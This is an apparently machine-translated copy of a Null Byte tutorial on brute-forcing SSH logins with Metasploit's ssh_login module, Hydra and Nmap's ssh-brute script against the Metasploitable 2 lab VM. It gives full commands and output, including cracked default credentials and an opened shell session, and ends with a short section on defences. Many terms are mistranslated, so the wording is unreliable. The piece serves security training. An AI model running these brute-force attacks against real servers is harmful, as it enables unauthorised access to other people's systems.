قالب وردپرس درنا توس
Home / Tips and Tricks / How to get SSH access to servers by brute-Force Credentials «Zero Byte :: WonderHowTo

How to get SSH access to servers by brute-Force Credentials «Zero Byte :: WonderHowTo



SSH is one of the most common protocols used in modern IT infrastructures, and because of this it can be a valuable attack vector for hackers. One of the most reliable ways to get SSH access to servers is by brute-force credentials. There are some methods for performing an SSH-brute-force attack that will ultimately lead to the discovery of valid login information.

Although not the only way to do this, we are exploring tools like Metasploit, Hydra and Nmap Scripting Engine in Nmap to perform this task, all of which are part of Kali Linux. When it comes to the goal, we will practice on Metasploitable 2, a deliberately vulnerable test environment for research and security research.

Overview of SSH

SSH, which stands for Secure Shell, is a network protocol that allows for encrypted communication over an unsafe network. This was developed as an alternative to Telnet, which sends information in plain text ̵

1; clearly a problem, especially when passwords are involved.

SSH's encryption network protocol operates on a client-server model, that is, the client initiates a connection to the server and communication is established after authentication occurs. SSH can use both passwords and private key authentication, whose latter is considered safer.

Recommended Reading Materials: SSH, The Secure Shell: The Final Wizard

Use for SSH includes providing a remote control logon and command reduction means, file transfer, mobile development, and connection debugging in cloud-based applications. Almost every large company implements SSH in one way or another, which makes it a valuable technology for getting acquainted with.

Scan with Nmap

Before we begin to attack broken violence, we must determine the state of the port that SSH is running on. We can perform a simple Nmap scan to see if it is open or not. Instead of scanning all standard ports, we can enter a single port number with the flag -p .

  nmap 172.16.1.102 -p 22 
  Start Nmap 7.70 (https: // nmap. Org) at 2019-02-26 14:58 CST
Nmap scan report for 172.16.1.102
Values ​​are up (0.0039s latency).

PORT STATE SERVICE
22 / tcp open ssh
MAC Address: 08: 00: 27: 77: 62: 6C (Virtual NIC)

Nmap done: 1 IP address (1 hosted) scanned 13.33 seconds 

Above we can see that port 22 is open and SSH service is running on it. It would be a waste of time if it was closed or not at all. Now we can start brute-force.

Method 1: Metasploit

The first method we will try today includes one of Metasploits help scanners. First, start the database PostgreSQL with the following command.

  service postgresql start 

Now we can fire the Metasploit by typing msfconsole in the terminal. You should see "msf" appearing, but for me it is "msf5" because I am using the latest version, Metasploit 5, which can be upgraded by running the latest version of Kali. It is always a good idea to stay updated to take advantage of the latest features and tools. Here is the command I use to update:

  apt-get update && apt-get dist-upgrade 

Next, after having greeted the msfconsole welcome banner, we can find the appropriate module with [Searchthe command.

  search ssh 
  Matching modules
================

Name Disclosure Date Rank Check Description
------------------ -----------
extra / dos / windows / ssh / sysax_sshd_kexchange 2013-03-17 normal No Sysax Multi-Server 6.10 SSHD Key Exchange Denial of Service
extra / fuzzers / ssh / ssh_kexinit_corrupt normal No SSH Key Exchange Init Corruption
extra / fuzzers / ssh / ssh_version_15 normal No SSH 1.5 Version Fuzzer
extra / fuzzers / ssh / ssh_version_2 normal No SSH 2.0 Version Fuzzer
extra / fuzzers / ssh / ssh_version_corrupt normal No SSH version corruption
help / scanner / http / cisco_firepower_login normal Yes Cisco Firepower Management Console 6.0 Log in
help / scanner / http / gitlab_user_enum 2014-11-21 normal Yes GitLab user account
help / scanner / ssh / apache_karaf_command_execution 2016-02-09 normal Yes Apache Carafe Standard References Command production
extra / scanner / ssh / cerberus_sftp_enumusers 2014-05-27 normal Yes Cerberus FTP Server SFTP User number
help / scanner / ssh / detect_kippo normal Yes Kippo SSH Honeypot Detector
help / scanner / ssh / eaton_xpert_backdoor 2018-07-18 normal Yes Eaton Xpert Meter SSH Private Key Exposure Scanner
help / scanner / ssh / fortinet_backdoor 2016-01-09 normal Yes Fortinet SSH Backdoor Scanner
extra / scanner / ssh / juniper_backdoor 2015-12-20 normal Yes Juniper SSH Backdoor Scanner
help / scanner / ssh / karaf_login normal Yes Apache Karaf Login Utility
help / scanner / ssh / libssh_auth_bypass 2018-10-16 normal Yes libssh Authentication Bypass Scanner
help / scanner / ssh / ssh_enumusers normal Yes SSH User number count
help / scanner / ssh / ssh_identify_pubkeys normal Yes SSH Public Key Acceptance Scanner
help / scanner / ssh / ssh_login normal Yes SSH Login Check Scanner
help / scanner / ssh / ssh_login_pubkey normal Yes SSH Public Key Login Scanner
help / scanner / ssh / ssh_version normal Yes SSH Version Scanner

... 

The module ssh_login is exactly what we need. Equip it with the command using . Then you will need "msf5 help (scanner / ssh / ssh_login) so you know you're working in the right place.

  Use help / scanner / ssh / ssh_login 

Then we can write to show available settings for the scanner

  options 
  Module options (extra / scanner / ssh / ssh_login):

Name Current setting Mandatory Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user / password pair stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing password, one per line
RHOSTS yes Target address range or CIDR identifier
RPORT 22 yes The goal gate
STOP_ON_SUCCESS false yes Stop guessing when a reference works for a host
THREADS 1 yes Number of simultaneous thread
USERNAME no A specific user name to authenticate as
USERPASS_FILE no File containing users and passwords separated by spaces, one pair per line
USER_AS_PASS false no Try the username as a password for all users
USER_FILE no File contains user name, one per line
VERBOSE false yes If you want to print the output for all attempts 

We need to set some things for this to work correctly. First RHOSTS is our IP address.

  set rhosts 172.16.1.102 
  rhosts => 172.16.1.102 

Next, STOP_ON_SUCCESS will end after finding

  set stop_on_success true 
  stop_on_success => true 
  stop_on_success => true 
  ] Then  USER_FILE  is a list of usernames. 

  set user_file users.txt 
  user_file => user. txt 

and PASS_FILE is a list of passwords.

  set pass_file passwords.txt 
  pass_file => passwords.txt 

Finally there is VERBOSE which will show all attempts.

  set verbose true 
  verbose => true 

For the user and password files, I used an abbreviated list of known references for this demonstration. In a real attack, you would probably want to use one of the familiar glossaries or a custom that suits your needs.

We should be all set now. Type run at the prompt to kick it off:

  run 
  [-] 172.16.1.102:22 - Failed: "user: password"
[-] 172.16.1.102:22 - Failed: & # 39; user: Password123 & # 39;
[-] 172.16.1.102:22 - Failed: & # 39; user: msfadmin & # 39;
[-] 172.16.1.102:22 - Failed: & # 39; users: admin & # 39;
[-] 172.16.1.102:22 - Failed: & # 39; user: default & # 39;
[-] 172.16.1.102:22 - Failed: & # 39; users: root & # 39;
[-] 172.16.1.102:22 - Failed: "user: toor"
[-] 172.16.1.102:22 - Failed: "user: hey"
[-] 172.16.1.102:22 - Failed: & # 39; users: welcome & # 39;
[-] 172.16.1.102:22 - Failed: & # 39; users: hunter2 & # 39;
[-] 172.16.1.102:22 - Failed: & # 39; msfadmin: password & # 39;
[-] 172.16.1.102:22 - Failed: & # 39; msfadmin: Password123 & # 39;
[+] 172.16.1.102:22 - Success: & # 39; msfadmin: msfadmin & # 39; Uid = 1000 (msfadmin) gid = 1000 (msfadmin) groups = 4 (adm), 20 (selection), 24 (cdrom), 29 (audio), 30 (dip), 44 (video), 46 ( plugdev), 107 (fuse), 111 (lpadmin), 112 (admin), 119 (sambashare), 1000 (msfadmin) Linux metasploitable 2.6.24 -16 server # 1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU / Linux & # 39;
[*] Command shell session 1 opened (172.16.1.100:37615 -> 172.16.1.102:22) at 2019-02-26 15:06:58 -0600
[*] Scanned 1 in 1 computers (100% complete)
[*] Implementation of Supplementary Module Modules 

Since we set the option, we can see all attempts that they take. Depending on the number of user names and password combinations, it can take quite some time to run.

When valid references exist, a successful message is displayed and a command shell is opened. It doesn't automatically drop us in, so we can view current active sessions with the sessions command .

  sessions 
  Active sessions
===============

Id Name Type Information Connection
---- ---- ----------- ----------
1 shell linux SSH msfadmin: msfadmin (172.16.1.102:22) 172.16.1.100:37615 -> 172.16.1.102:22 (172.16.1.102) 

This says it is an SSH connection. To interact with this session, use the -i flag.

  sessions -i 1 
  [*] Start interaction with 1 ...

id
uid = 1000 (msfadmin) gid = 1000 (msfadmin) groups = 4 (adm), 20 (dialing), 24 (cdrom), 25 (floppy), 29 (audio), 30 (dip), 44 (video), 46 (plugdev), 107 (fuse), 111 (lpadmin), 112 (admin), 119 (sambashare), 1000 (msfadmin) 

Now we are connected to the target via SSH and can run commands as usual.

Method 2: Hydra

The next tool we will use is Hydra, a powerful login cracker that is very fast and supports a number of different protocols. To show help and some basic usage options, just write hydra in the terminal. (Note: If you were previously in the msf console, make sure you disc out of it before using Hydra.)

  hydra 
  Hydra v8.8 (c) 2019 by van Hauser / THC is not used in military or secret service organizations or for illegal purposes.

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [service://server[:PORT][/OPT]]

Alternative:
-l LOGIN or -L FIL login with LOGIN name, or load multiple logins from FIL
-P PASS or -P FILE try password PASS, or load multiple passwords from FILE
-C FILE colon separated "login: pass" format, instead of -L / -P options
-M FILE list of servers to attack, one entry per line, & # 39;: & # 39; to enter port
-t TASKS runs TASKS number of connections in parallel per target (default: 16)
-Use details for the user module
-h more command line options (SUPPLEMENTARY HELP)
server target: DNS, IP or 192.168.0.0/24 (this OR -M option)
service crack service (see below for supported protocols)
OPT some service modules support additional input (-U for module help)

Supported Services: adam6500 asterisk cisco cisco-enable cvs firebird ftp ftps http [s] - {head | get | post} http [s] - {get | post} -forma http-proxy urlenum icq imap [s] irc ldap2 [s] ldap3 [-{cram|digest}md5][s]   mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3 [s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sms smtp [s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet [s] vmauthd vnc xmpp

Hydra is a tool for guessing / cracking valid login / password pairs. Licensed under AGPL
v3.0. The latest version is always available at https://github.com/vanhauser-thc/thc-hydra
Do not use in military or secret service organizations or for illegal purposes.

Example: hydra -l-user -P passlista.txt ftp://192.168.0.1 

Hydra contains a number of options, but today we use the following:

  • Flag -L which indicates a list of login names.
  • Flag -P which specifies a list of passwords.
  • ssh: //172.16.1.102 - our goal and the protocol. The flag -t added to 4 indicating the number of parallel tasks to run.

Once we shut it down, the tool displays the status of the attack:

  hydra -L users.txt -P password.txt ssh: //172.16.1.102 -t 4 
  Hydra v8.8 (c) 2019 by van Hauser / THC - Please do not use in military or secret service organizations or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) begins at 2019-02-26 15:12:47
[DATA] max 4 tasks per 1 server, a total of 4 tasks, 90 login searches (l: 9 / p: 10), ~ 23 attempts per task
[DATA] attacker ssh: //172.16.1.102: 22 / 

After a period of time, it will complete and show us the number of successful logs found.

  [22] [ssh] host: 172.16.1.102 login: msfadmin password: msfadmin
[STATUS] 44.00 trial / min, 44 attempts in 00: 01h, 46 to do in 00: 02h, 4 active
[STATUS] 42.00 trial / min, 84 attempts in 00: 02h, 6 to do in 00: 01h, 4 active
1 out of 1 goals successfully completed, 1 valid password was found
Hydra (https://github.com/vanhauser-thc/thc-hydra) completed 2019-02-26 15:15:10 

Hydra's parallel processing power makes it a good choice when a large number of potential references are involved.

Method 3: Nmap Scripting Engine

The last method for broken mandatory SSH references that we will try today includes the use of Nmap Scripting Engine. NSE contains a script that will attempt to brute-force all possible combinations of a user name and password pair. To perform this attack, we can run a simple Nmap scan from a new terminal, just as before, but with some additional options thanked:

  • - script ssh-brute specifies the script to use.
  • - script args will specify the arguments for the script, separated by a comma.
  • userdb = users.txt is the list of usernames we want to use
  • passdb = passwords.txt is the list of passwords we want to use.

Now we are ready to start the scan:

  nmap 172.16.1.102 -p 22 - script ssh-brute - script-args userdb = users.txt, passdb = password.txt 
  Start Nmap 7.70 (https: //nmap.org) at 2019-02-26 15:17 CST 

NSE will show brute-force attempts and which credentials are attempted. Be patient - depending on how many user names and passwords are used, it may take some time.

  NSE: [ssh-brute] Try username / password pair: user: user
NSE: [ssh-brute] Try username / password pair: msfadmin: msfadmin
NSE: [ssh-brute] Try username / password pairs: admin: admin
NSE: [ssh-brute] Try username / password pair: root: root
NSE: [ssh-brute] Try username / password pair: john: john
NSE: [ssh-brute] Try username / password pair: default: standard
NSE: [ssh-brute] Try username / password pair: support: support
NSE: [ssh-brute] Try username / password pair: service: service
NSE: [ssh-brute] Try username / password pair: adam: adam
NSE: [ssh-brute] Try username / password pair: admin: password
NSE: [ssh-brute] Try username / password pair: root: password
NSE: [ssh-brute] Try username / password pair: john: password
NSE: [ssh-brute] Try username / password pair: default: password
NSE: [ssh-brute] Try username / password pair: support: password
NSE: [ssh-brute] Try username / password pair: adam: password
NSE: [ssh-brute] Try username / password pair: admin: Password123
NSE: [ssh-brute] Try username / password pair: root: Password123
NSE: [ssh-brute] Try username / password pair: john: Password123
NSE: [ssh-brute] Try username / password pair: default: Password123

... 

After a while, the scan will be completed and a report will be displayed in the terminal.

  Nmap scan report for 172.16.1.102
Values ​​are up (0.0011s latency).

PORT STATE SERVICE
22 / tcp open ssh
| ssh brute:
| accounts:
| Users: Users - Valid credentials
| msfadmin: msfadmin - Valid credentials
| service: service - valid information
| _ Statistics: Performed 66 guesses at 124 seconds, average tps: 0.5
MAC Address: 08: 00: 27: 77: 62: 6C (Virtual NIC)

Nmap done: 1 IP address (1 hosted) scanned for 147.59 seconds 

Above we can see the detected three valid login details. This script is useful because it will solve all possible pairs of usernames and passwords, sometimes resulting in more results.

How to Prevent SSH Brute-Force

The reality is that if you have a server facing the internet, there will be lots of SSH brute-force attempts daily, many of which are automatic . But don't be afraid, there are some simple solutions to protect against this and reduce the number of login attempts.

Perhaps one of the easiest things is to change the port number that SSH is working on. Although this will discourage the most rudimentary brute force attempts, it is trivial to search for SSHs running on alternative ports.

A better method is to implement a service such as Fail2ban, DenyHosts or iptables to block brutal power attempts at host level. This, combined with using private key authentication instead of passwords, will make you out of reach of most attackers. If password-based authentication is absolutely necessary, use strong passwords and follow best practices.

Wrapping

In this guide we learned about SSH and how to brute-force credentials to gain access to a goal. First, we covered how to identify open ports that drive SSH. Then we learned how to mount a brute force attack with three methods: Metasploit, Hydra and Nmap Scripting Engine. Finally, we went over some ways to protect against these types of attacks.

SSH is an extremely common protocol, so it's important that every hacker knows how to attack it - and how to prevent it.

Cover image by Skitterphoto / Pexels; Screenshots of drd_ / Null Byte

Source link